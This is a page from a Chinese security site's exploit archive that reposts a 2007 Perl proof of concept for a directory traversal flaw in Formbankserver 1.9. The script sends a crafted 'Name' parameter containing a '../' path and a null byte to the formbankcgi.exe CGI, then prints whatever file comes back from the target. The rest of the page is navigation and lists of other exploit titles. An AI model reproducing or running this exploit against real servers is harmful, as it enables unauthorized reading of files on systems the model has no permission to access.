首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Formbankserver 1.9 (Name) Directory Transversal Vulnerability
来源:vfocus.net 作者:Bl0od3r 发布时间:2007-01-02  

#!perl
#found by Bl0od3r
#visit http://dc3.dl.am
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
#developer:http://www.fersch.de/formbankserver/
use LWP::Simple;
sub usage
{
die("file.pl host.com /../file.txt");
}
$host= $ARGV[0];
$file= $ARGV[1];
if (!$host) {
die("No Host.");
} ; if (!$file) {
die("No File.");
}
getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Rediff Bol Downloader (ActiveX
·Apple Quicktime (rtsp URL Hand
·Fishyshoop <= 0.930b Remote
·QK SMTP <= 3.01 (RCPT TO) R
·Ciberia Content Federator 1.0
·TaskTracker <= 1.5 (Customi
·MTCMS <= 2.0 (admin/admin_s
·Pheap CMS <= 1.1 (lpref) Re
·Pagetool CMS <= 1.07 (pt_up
·TIBCO Rendezvous <= 7.4.11
·Ultimate PHP Board <= 2.0b1
·TIBCO Rendezvous <= 7.4.11
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved